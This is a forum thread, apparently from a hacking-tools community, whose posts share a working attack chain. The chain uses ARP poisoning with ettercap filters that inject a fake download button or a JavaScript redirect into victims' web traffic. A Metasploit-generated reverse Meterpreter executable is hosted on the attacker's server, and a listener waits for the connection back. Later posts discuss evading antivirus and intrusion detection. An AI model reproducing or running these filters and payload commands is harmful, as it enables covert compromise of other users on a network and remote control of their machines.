Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: ettercap filter html injection meterpeter.exe

Hybrid View

  1. #1
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default ettercap filter html injection meterpeter.exe

    take a look at the filter, look at what is being replaced... its sort of html injection on the fly
    if any one wants to see a quick video i can post one to give you a better idea

    what i did was create a reverse meteperter executable then hosted it on a server and did
    some arp poisoning with some html injection and you could use this to trick people into
    downloading the .exe and get your self a shell

    this is just a proof of concept and i take no responsibility


    html.filter
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
               replace("Accept-Encoding", "Accept-Nothing!");
          }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
          if (search(DATA.data, "<title>")) {
               replace("</title>", "</title><form action="http://192.168.1.6/meterpeter.exe" method="link"><img src="http://192.168.1.6/alert.gif"><INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form><html><body><h10>just some instructions</h10></body></html>");
               msg("html injected");
          }}
    i think this is the working filter


    -create the meterpeter.exe-
    (open msfconsole)
    ./msfpayload windows/meterpeter/reverse_tcp LHOST=192.168.1.6 LPORT=100 x > meterpeter.exe
    Now place the executable into your Apache root directory

    -set up your listener-
    use exploit/multi/handler
    set PAYLOAD windows/meterpeter/reverse_tcp
    set LHOST 192.168.1.6
    set LPORT 100

    -execute ettercap-
    etterfilter html.filter -o html.ef
    ettercap -T -q -F html.ef -M ARP // //

    now wait for some one on the network to download and execute meterpeter.exe and you will have a reverse shell

    Let me know what you think

  2. #2
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Code:
    Let me know what you think
    Nice, but you need a fair amount of social engineering
    Don't eat yellow snow :rolleyes:

  3. #3
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    If i had skill in html, java or php... the webpage would sell it self
    Code:
    <form action="http://192.168.1.6/meterpeter.exe" method="link">
    <img src="http://192.168.1.6/alert.gif">
    <INPUT TYPE=submit value="DOWNLOAD meterpeter.exe">
    </form><html><body><h10>just some instructions</h10></body></html>
    maybe give me some suggestions

  4. #4
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Don't pick me wrong, the idea is really nice. Unless you can't exploit some vulnerability you almost always depend on the user to click and/or download anything. Evilgrade is an exception to this.
    Don't eat yellow snow :rolleyes:

  5. #5
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    http://www.infobyte.com.ar/demo/evilgrade.htm
    wow this looks cool... i was not sure what evilgrade was

  6. #6
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default Hey BigMac

    I recently posted about this, its in the newbie area under "Vista remote shell with phish" i have since perfected it... given a little time to work with it but i have a filter (dns wasnt working too well) that will redirect all traffic.

    Thanks go out to hawaii67 for posting this filter some time ago, i'll try to find that post and put it in here later.

    Try this as your filter, if the Target machine already has a web page open, it will give an error "404" after they attempt to refresh(or open another page) it will redirect to your HTTPD server.

    #FILTER START#

    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    msg("changed Accept-Encoding!\n");
    }
    }
    if (ip.proto == TCP && tcp.src == 80) {
    replace("<BODY", "&#x000D<BODY onload=\"javascript:document.location.href='inster t your site here'\"><XSS a=");
    replace("<body", "&#x000D<body onload=\"javascript:document.location.href='insert your site here'\"><XSS a=");
    msg("Filter Ran.\n");
    }


    #FILTER END#

    --EDIT--
    This post doesnt allow script spacing, but im sure you'll get it. I also have the web pages built and yes they do SELL THEMSELVES. If anyones interested send me a message or an email, and ill send you a copy of what i have thus far. (im not sure if i can put them on here?)
    And the original script was posted in a Backtrack 2.0 post entitled "ettercap filters" page 2 of the post if anyone wants to read more about it.

  7. #7
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    <P ALIGN=center><IFRAME SRC="http://server" WIDTH=300 HEIGHT=100></IFRAME></P>

    this iframe has potential

    and check out irongeeks latest video's... bypass anti-vir fully undetected...

  8. #8
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default ill look into it

    I watched the video, the problem with the normal way we both had going is that vista's ids picks it up (note that XP sp3 does not ...it just runs), this may solve that problem. The normal way with meterpreter/reverse_http does not set off ids, however it really doesnt work. I will play around with the code for the filter and with my setup and see if it gets past IDS. My money says it will. But ill let you know.
    Also i think you will find that windows users have come to expect the OS asking them "do you want to?, do you really?, are you sure?, thats not such a good idea!, DO YOU REALLY!!!?".
    lol, but again, give me a day or two to test some things and ill get back to you.

  9. #9
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    have you tested this msfencode? http://metasploit.com/dev/trac/wiki/...ingMeterpreter

    its not working for me... i use the correct commands and check the ls -alrt and then i execute this payload on one of my computers but the exploit multi handler does not get a connection ? ? ? im stumped

  10. #10
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default No that one doesnt work for me.

    i have tried it, i could not get it to work either, the only one that gives me a connection is the Original script, there must be something in the EXE payload thats not running, im still playing with it.
    The next step for me is to start trouble shooting by running a few pre-made exe files and see if ANY connect back. If not, i will see if i cant find out why. I think it has something to do with the way the payload is initiated. Ill start trouble shooting tommorow.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •